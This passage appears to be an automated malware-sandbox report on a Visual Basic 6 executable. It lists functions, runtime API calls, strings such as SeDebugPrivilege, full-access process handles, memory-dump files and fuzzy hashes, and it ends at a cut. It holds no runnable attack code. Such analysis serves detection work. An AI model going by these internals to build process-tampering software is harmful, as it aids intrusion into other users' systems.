Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
String ID:
API String ID: 3281955820-0
Opcode ID: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
Instruction ID: 4833bfc8c810be8c7ee48596b44bcdea636671ab31cf8706ef4dadcd7055b152
Opcode Fuzzy Hash: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
Instruction Fuzzy Hash: 4A51B470A00215AFDB14DF64DDA5AFABBB5FB49740F21802AE505A7350C774ACC2CBA9

Function 0040ACA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ACBE
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AD05
__vbaStrCat.MSVBVM60( RO,00000000,?,?,?,?,004025E6), ref: 0040AD3D
__vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD48
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,?,004025E6), ref: 0040AD61
__vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD6C
__vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,?,004025E6), ref: 0040AD87
__vbaStrCat.MSVBVM60( RO,00000000,?,?,004025E6), ref: 0040ADA2
__vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADAD
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,004025E6), ref: 0040ADC7
__vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADD2
__vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,?,004025E6), ref: 0040ADED

Strings

RO, xrefs: 0040AD38, 0040AD9D
Once, xrefs: 0040AD5C, 0040ADC2

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$FreeList$ChkstkError
String ID: RO$Once
API String ID: 3210543181-275216174
Opcode ID: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
Instruction ID: 52c490b129e582bc3dafaca85e5bb0199f8b140a8a0a8e676f0dccd7654b22b4
Opcode Fuzzy Hash: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
Instruction Fuzzy Hash: C9413471900208EFD704DF94DE49BEEBBB8FB4C304F108129F916A72A0DB755A44CBA9

Function 00410C70 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
__vbaOnError.MSVBVM60(000000FF,00000000,6CF8D8B1,6CF8DF85,00000000,004025E6), ref: 00410CBE
__vbaSetSystemError.MSVBVM60 ref: 00410CD3
__vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
__vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
__vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 00410D5A
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00410D6B
__vbaFreeStr.MSVBVM60 ref: 00410D83
__vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 00410DE0
__vbaSetSystemError.MSVBVM60(?), ref: 00410E35

Strings

SeDebugPrivilege, xrefs: 00410D51

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
String ID: SeDebugPrivilege
API String ID: 1749655604-2896544425
Opcode ID: f636320db0520c6460c5fd51245f71b2210e99ae5d457a238845d81d681894fc
Instruction ID: 19430b606137baf8db46125749817fb036df22dc0e74aca3634fbbd968d53a81
Opcode Fuzzy Hash: f636320db0520c6460c5fd51245f71b2210e99ae5d457a238845d81d681894fc
Instruction Fuzzy Hash: E3512EB1900308DBDB14DFA1DA09BEEB7B8BB04704F20812EE105BB191D7B85A89DF55

Function 00418A10 Relevance: 22.6, APIs: 15, Instructions: 76COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00418A2E
__vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00418A5B
__vbaStrCopy.MSVBVM60 ref: 00418A67
__vbaOnError.MSVBVM60(000000FF), ref: 00418A76
__vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00418A8F
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418A9F
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AAD
__vbaFreeStr.MSVBVM60 ref: 00418AB6
__vbaStrToAnsi.MSVBVM60(?,?), ref: 00418ACB
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418ADB
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AE9
__vbaFreeStr.MSVBVM60 ref: 00418AF2
__vbaSetSystemError.MSVBVM60(?), ref: 00418B08
__vbaFreeStr.MSVBVM60(00418B32), ref: 00418B22
__vbaFreeStr.MSVBVM60 ref: 00418B2B

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
String ID:
API String ID: 3031735744-0
Opcode ID: de2cb393b24f7ac5ffc4dd8badd9aec4615ba2a8af61c512e53155f7c5b6804a
Instruction ID: 31f6dc709dd63b5e7e6354cc984dc1dfaca077b65c72c4c2232904d0b2341183
Opcode Fuzzy Hash: de2cb393b24f7ac5ffc4dd8badd9aec4615ba2a8af61c512e53155f7c5b6804a
Instruction Fuzzy Hash: A031FCB5800209EBCB04DFE4DE58ADE7B78FB48315F108559F211B72A0DB756A44CB68

Function 0040FF70 Relevance: 21.1, APIs: 14, Instructions: 80COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(6CF8D8B1,6CF7A323,00000000), ref: 0040FFAA
#537.MSVBVM60(00000000,?,00000001), ref: 0040FFBD
__vbaStrMove.MSVBVM60 ref: 0040FFCA
__vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FFCE
__vbaFreeStr.MSVBVM60 ref: 0040FFE2
#537.MSVBVM60(00000000,?,00000001), ref: 0040FFF5
__vbaStrMove.MSVBVM60 ref: 0040FFFC
__vbaInStr.MSVBVM60(00000000,00000000), ref: 00410001
#616.MSVBVM60(?,-00000001), ref: 00410011
__vbaStrMove.MSVBVM60 ref: 0041001C
__vbaFreeStr.MSVBVM60 ref: 00410021
__vbaStrCopy.MSVBVM60 ref: 0041002D
__vbaFreeStr.MSVBVM60(0041005D), ref: 00410056
__vbaErrorOverflow.MSVBVM60 ref: 00410073

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$FreeMove$#537Copy$#616ErrorOverflow
String ID:
API String ID: 3249593964-0
Opcode ID: 1275576801f9687499aa79f0ee0564375320d38fe15e01250de86d500da99eea
Instruction ID: 3391faed527fa42239c90739200fcb3ec4dff878199542e7df0cbe2f1190cda9
Opcode Fuzzy Hash: 1275576801f9687499aa79f0ee0564375320d38fe15e01250de86d500da99eea
Instruction Fuzzy Hash: EC212F71D00109ABCB04DFA5DD89AEFBB78FF59700F10812AE516B72A0DB785945CB98

Function 00419700 Relevance: 19.6, APIs: 13, Instructions: 120COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,6CF8D8B1,00000000,6CF82523), ref: 0041975B
__vbaAryLock.MSVBVM60(?,00000000), ref: 00419775
__vbaGenerateBoundsError.MSVBVM60 ref: 00419796
__vbaGenerateBoundsError.MSVBVM60 ref: 004197A5
__vbaAryLock.MSVBVM60(?,?), ref: 004197B2
__vbaGenerateBoundsError.MSVBVM60 ref: 004197CD
__vbaGenerateBoundsError.MSVBVM60 ref: 004197D6
__vbaSetSystemError.MSVBVM60(00000000,00000000,00000000), ref: 004197F9
__vbaAryUnlock.MSVBVM60(?), ref: 00419809
__vbaAryUnlock.MSVBVM60(?), ref: 0041980F
__vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00419822
__vbaAryDestruct.MSVBVM60(00000000,?,0041984F,6CF8D8B1,00000000,6CF82523), ref: 00419848
__vbaErrorOverflow.MSVBVM60(00000000,6CF8D8B1,00000000,6CF82523), ref: 00419860

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
String ID:
API String ID: 3281955820-0
Opcode ID: ccc3478dbcd7e51189b4f7c35bd8fb3331cd942d6aa921c6006e7f43fcf8eea8
Instruction ID: 91cd715af1cd97156beb3a758445edf250c8698d8b352ee1a2a14870601594c5
Opcode Fuzzy Hash: ccc3478dbcd7e51189b4f7c35bd8fb3331cd942d6aa921c6006e7f43fcf8eea8
Instruction Fuzzy Hash: E0418F75910219AFCB04EFA4CD95AEEB7B9FF48700F14811AE501B7290D7B4AC81CBE9

Function 00410560 Relevance: 18.1, APIs: 12, Instructions: 129COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
__vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004105E8
__vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
__vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
__vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,?,004025E6), ref: 00410645
__vbaSetSystemError.MSVBVM60(?,0041B1D4,?,?,?,?,004025E6), ref: 0041067E
__vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004106D3
__vbaSetSystemError.MSVBVM60(00000000), ref: 004106FC
__vbaSetSystemError.MSVBVM60(00000000), ref: 00410712
__vbaSetSystemError.MSVBVM60(?,0041B1D4,?,?,?,?,004025E6), ref: 00410735
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,004025E6), ref: 00410758

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$System$Chkstk
String ID:
API String ID: 1207130036-0
Opcode ID: 62ff90cb35de8ef11aa2b30622b115efdf93fef2ebd10f5ae9c3101067cccd5d
Instruction ID: 2137da7fcd73fff1979705b1bef70d61cd8a95bb74c88752949aaefb45c8b53a
Opcode Fuzzy Hash: 62ff90cb35de8ef11aa2b30622b115efdf93fef2ebd10f5ae9c3101067cccd5d
Instruction Fuzzy Hash: 6C5107B4901208EBDB14DFA4DA48BDEBBB4FF48314F20805AE51477390C7B99A84DF69

Function 00410E60 Relevance: 18.1, APIs: 12, Instructions: 85COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,0040BC66,0041B038,?,?,?,004025E6), ref: 00410E7E
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00410EAE
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00410EC5
__vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,00000000,004025E6), ref: 00410ED1
__vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410EDF
__vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00410EE8
__vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F03
__vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F14
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F25
__vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410F33
__vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,00000000,004025E6), ref: 00410F41
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,00000000,004025E6), ref: 00410F57

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$AnsiErrorUnicode$FreeSystem$ChkstkList
String ID:
API String ID: 3861917509-0
Opcode ID: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
Instruction ID: d7813b94c935956c428f1e1f47a44fa569b160c913a03527725d119065563702
Opcode Fuzzy Hash: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
Instruction Fuzzy Hash: 9E31ECB5901208EFDB04DFA4DA49BDEBBB8FB48714F108119F515BB290D7B89A44CBA4

Function 0040FA50 Relevance: 18.1, APIs: 12, Instructions: 67COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
__vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
#648.MSVBVM60(0000000A), ref: 0040FABD
__vbaFreeVar.MSVBVM60 ref: 0040FACA
__vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
#570.MSVBVM60(?), ref: 0040FAFB
#525.MSVBVM60(00000000), ref: 0040FB02
__vbaStrMove.MSVBVM60 ref: 0040FB0D
__vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
__vbaFileClose.MSVBVM60(?), ref: 0040FB37
__vbaStrCopy.MSVBVM60 ref: 0040FB4A
__vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$FileFree$#525#570#648ChkstkCloseCopyErrorGet3MoveOpen
String ID:
API String ID: 947554498-0
Opcode ID: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
Instruction ID: 2ea1275da5938a61f9bbdbea3727b2d8b601beaa9e21b66b0b90c65097ce1408
Opcode Fuzzy Hash: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
Instruction Fuzzy Hash: A031ECB5800248EBDB04DFD4DA58BDEBBB4FF08715F208169E511B72A0DB795A44CB64

Function 00404843 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040CF8E
__vbaOnError.MSVBVM60(000000FF,?,00000000,004025E6), ref: 0040CFD5
__vbaObjSet.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0040D006
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,0000004C), ref: 0040D039
__vbaFreeObj.MSVBVM60 ref: 0040D078
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D0C1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,00000040), ref: 0040D0F9
__vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 0040D11C
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D12F
__vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040D152
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D15D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040D190
__vbaFreeObj.MSVBVM60 ref: 0040D1AB

Strings

?, xrefs: 00404843

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$CallCastChkstkErrorLateList
String ID: ?
API String ID: 269068952-1684325040
Opcode ID: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
Instruction ID: e12f10e6882a07b68982d9b1f0c67d4f52429f3b1a0b66e6b96f65459c310862
Opcode Fuzzy Hash: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
Instruction Fuzzy Hash: 06511B75900208EBDB14DFA4C948BDEBBB4FF48704F208269F509BB291D7759A85CF68

Function 00415C8A Relevance: 16.5, APIs: 11, Instructions: 31COMMON

Download Yara Rule

APIs

__vbaI2I4.MSVBVM60 ref: 00415C93
__vbaFileClose.MSVBVM60(00000000), ref: 00415C9C
__vbaI2I4.MSVBVM60 ref: 00415CA1
__vbaFileClose.MSVBVM60(00000000), ref: 00415CA4
__vbaExitProc.MSVBVM60 ref: 00415CAD
__vbaAryDestruct.MSVBVM60(00000000,?,00415D0C), ref: 00415CE6
__vbaFreeStr.MSVBVM60 ref: 00415CF5
__vbaFreeStr.MSVBVM60 ref: 00415CFA
__vbaFreeStr.MSVBVM60 ref: 00415CFF
__vbaFreeStr.MSVBVM60 ref: 00415D04
__vbaFreeStr.MSVBVM60 ref: 00415D09

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$CloseFile$DestructExitProc
String ID:
API String ID: 1320429144-0
Opcode ID: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
Instruction ID: ac45af5dedd4f35385674aac5ef352c541f385de1dfbdc7eb18f47d75152aea7
Opcode Fuzzy Hash: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
Instruction Fuzzy Hash: 53F0A471C1416CDBCB08EBA0ED55ADDBB38EF94310F11402AE846B31B49E702E85CEA4

Function 0040E570 Relevance: 15.1, APIs: 10, Instructions: 72COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E58E
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,004025E6), ref: 0040E5D4
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E5E3
__vbaVarVargNofree.MSVBVM60(?,?,?,?,004025E6), ref: 0040E5F6
__vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,004025E6), ref: 0040E5FD
__vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E608
__vbaChkstk.MSVBVM60 ref: 0040E620
__vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E646
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040E652
__vbaFreeObj.MSVBVM60(0040E67A,?,?,?,?,?,?,004025E6), ref: 0040E673

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$ChkstkFree$AddrefCopyErrorEventMoveNofreeRaiseVarg
String ID:
API String ID: 3705209087-0
Opcode ID: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
Instruction ID: 36ceea50de92772e66bb97ede622d2113149341719cd49f3f7e07eaeda4390cb
Opcode Fuzzy Hash: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
Instruction Fuzzy Hash: 9F31F875900208EFCB04DF94C949B9DBBB4FF48304F108669F515B73A0D774AA85CB98

Function 00404829 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
__vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
__vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,0000000C), ref: 0040CD18
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
__vbaExitProc.MSVBVM60 ref: 0040CD31

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$CheckHresult$ErrorExitFreeListNew2Proc
String ID:
API String ID: 306309671-0
Opcode ID: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
Instruction ID: 6c1e095cc9405d84f172de8fc6481e1172c739fb8f3d4ebecced46b1c4c61411
Opcode Fuzzy Hash: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
Instruction Fuzzy Hash: 7F312D71910214EBDB10AF95CE89EDEBBBCFF08B40F10412AF545B3690D77899458BA9

Function 00414D90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

_adj_fdiv_m64.MSVBVM60(6CF8D83C,00000000), ref: 00414DCE
__vbaR8IntI4.MSVBVM60(h#@,6CF8D83C,00000000), ref: 00414DE2
_adj_fdiv_m64.MSVBVM60 ref: 00414E27
__vbaR8IntI4.MSVBVM60 ref: 00414E32

Strings

h#@, xrefs: 00414DD7

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba_adj_fdiv_m64
String ID: h#@
API String ID: 2746309926-1911584123
Opcode ID: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
Instruction ID: 05541adafa65650a58b6c4144f1ab09d364fc37ea7f5c0a10f88b274b74e223b
Opcode Fuzzy Hash: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
Instruction Fuzzy Hash: 2E214570A04301AFC7489F28EB4829ABBE5FBC8351F10853EE584962A4DB7C88D4C71A

Function 00418E20 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000080,00000001,0041B108,00000011,00000001,00000FFF,00000000,00000000,00419504), ref: 00418E5D
__vbaGetOwner3.MSVBVM60(00407524,0041B108,00000000), ref: 00418E78
__vbaGenerateBoundsError.MSVBVM60 ref: 00418E9A
__vbaGenerateBoundsError.MSVBVM60 ref: 00418EAA
__vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EE6
__vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EFC
__vbaErrorOverflow.MSVBVM60(00000000,00419504), ref: 00418F21

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$BoundsGenerate$OverflowOwner3Redim
String ID:
API String ID: 3413436688-0
Opcode ID: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
Instruction ID: a558a39c5bab9556473eca7b03ab59ba202b493018f5e1d000dd0332b3e70a7e
Opcode Fuzzy Hash: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
Instruction Fuzzy Hash: F021D338604361EBC714CF14ED65BE17762FB48781B158069EE01A77A5CBB5A8C1CBDC

Function 0040E6A0 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

